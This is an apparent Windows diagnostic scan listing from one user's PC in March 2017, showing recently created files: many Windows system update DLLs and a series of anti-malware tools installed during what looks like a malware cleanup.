2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2017-03-16 16:20 - 2017-03-16 16:20 - 05755024 _____ (Zemana Ltd. ) C:\Users\Nekut\Downloads\Zemana.AntiMalware.Setup.exe
2017-03-15 22:01 - 2017-03-16 16:38 - 01038464 _____ C:\WINDOWS\system32\Drivers\sfi.dat
2017-03-15 22:01 - 2017-03-15 22:01 - 00001904 _____ C:\Users\Public\Desktop\COMODO Internet Security.lnk
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\WINDOWS\System32\Tasks\COMODO
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Shared Space
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo Downloader
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\Program Files\COMODO
2017-03-15 21:58 - 2017-03-15 21:59 - 73804768 _____ (COMODO) C:\Users\Nekut\Downloads\cispremium_only_installer.exe
2017-03-15 21:55 - 2017-03-15 21:55 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-03-15 21:23 - 2017-03-15 21:58 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-15 21:18 - 2017-03-15 21:18 - 00000000 ____D C:\ProgramData\ProcessLasso
2017-03-15 21:10 - 2017-03-15 21:00 - 00024064 _____ C:\WINDOWS\zoek-delete.exe
2017-03-15 21:00 - 2017-03-15 21:09 - 00000000 ____D C:\zoek_backup
2017-03-15 20:59 - 2017-03-15 21:00 - 01309184 _____ C:\Users\Nekut\Downloads\zoek.exe
2017-03-15 20:55 - 2017-03-15 20:55 - 00000000 ____D C:\Users\Nekut\AppData\Local\Adobe
2017-03-15 19:40 - 2017-03-15 20:15 - 03182592 _____ C:\Users\Nekut\Downloads\Nabozenstvi.ppt
2017-03-15 19:35 - 2017-03-15 19:35 - 02073600 _____ C:\Users\Nekut\Downloads\DUM_cihakova_Svetova_nabozenstvi.ppt
2017-03-15 18:32 - 2017-03-15 20:26 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-15 18:32 - 2017-03-15 18:59 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-15 18:30 - 2017-03-15 18:31 - 26131528 _____ C:\Users\Nekut\Downloads\RogueKillerX64.exe
2017-03-15 18:17 - 2017-03-15 18:17 - 00000000 ____D C:\ProgramData\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00002775 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\Program Files (x86)\Sophos
2017-03-15 18:12 - 2017-03-15 18:16 - 164051504 _____ (Sophos Limited) C:\Users\Nekut\Downloads\Sophos Virus Removal Tool.exe
2017-03-15 17:57 - 2017-03-15 17:58 - 01663904 _____ (Malwarebytes) C:\Users\Nekut\Downloads\JRT.exe
2017-03-15 17:31 - 2017-03-15 21:58 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-15 17:30 - 2017-03-16 16:46 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-15 17:30 - 2017-03-15 17:30 - 00001918 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-15 17:30 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-15 17:28 - 2017-03-15 17:29 - 57131432 _____ (Malwarebytes ) C:\Users\Nekut\Downloads\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-15 17:23 - 2017-03-15 17:51 - 00000000 ____D C:\AdwCleaner
2017-03-15 17:22 - 2017-03-15 17:23 - 04031440 _____ C:\Users\Nekut\Desktop\AdwCleaner.exe
2017-03-15 17:14 - 2017-03-15 17:14 - 00448512 _____ (OldTimer Tools) C:\Users\Nekut\Downloads\TFC.exe
2017-03-15 17:09 - 2017-03-15 17:10 - 00050688 _____ (Atribune.org) C:\Users\Nekut\Downloads\ATF-Cleaner.exe
2017-03-14 19:18 - 2017-03-14 19:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\Nekut\Downloads\HijackThis.exe
2017-03-14 18:36 - 2017-03-04 08:57 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-03-14 18:36 - 2017-03-04 08:57 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-03-14 18:36 - 2017-03-04 08:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-03-14 18:36 - 2017-03-04 08:24 - 00090976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2017-03-14 18:36 - 2017-03-04 08:09 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 00497416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-03-14 18:36 - 2017-03-04 08:08 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-03-14 18:36 - 2017-03-04 08:07 - 00557400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-03-14 18:36 - 2017-03-04 08:04 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-03-14 18:36 - 2017-03-04 08:02 - 00184416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2017-03-14 18:36 - 2017-03-04 07:56 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-03-14 18:36 - 2017-03-04 07:56 - 00248992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 02277288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 00524776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00781152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00493912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00313568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00549088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-03-14 18:36 - 2017-03-04 07:50 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 06667528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 04023000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01853224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01202384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00981376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00976184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00530480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00352760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-03-14 18:36 - 2017-03-04 07:46 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-03-14 18:36 - 2017-03-04 07:46 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2017-03-14 18:36 - 2017-03-04 07:45 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-03-14 18:36 - 2017-03-04 07:45 - 00112120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01415240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01260784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-03-14 18:36 - 2017-03-04 07:42 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2017-03-14 18:36 - 2017-03-04 07:40 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-03-14 18:36 - 2017-03-04 07:36 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-03-14 18:36 - 2017-03-04 07:34 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-03-14 18:36 - 2017-03-04 07:30 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-03-14 18:36 - 2017-03-04 07:28 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2017-03-14 18:36 - 2017-03-04 07:25 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCCSEngineShared.dll
2017-03-14 18:36 - 2017-03-04 07:25 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-03-14 18:36 - 2017-03-04 07:23 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiohlp.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 01299968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icm32.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2017-03-14 18:36 - 2017-03-04 07:21 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 13873664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPTpm12.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msutb.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00714752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-03-14 18:36 - 2017-03-04 07:19 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssphtb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-03-14 18:36 - 2017-03-04 07:17 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-03-14 18:36 - 2017-03-04 07:17 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00762880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscms.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 01543680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2017-03-14 18:36 - 2017-03-04 07:15 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\azroleui.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 04613120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01137152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\regedit.exe
2017-03-14 18:36 - 2017-03-04 07:10 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcuiu.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00570368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
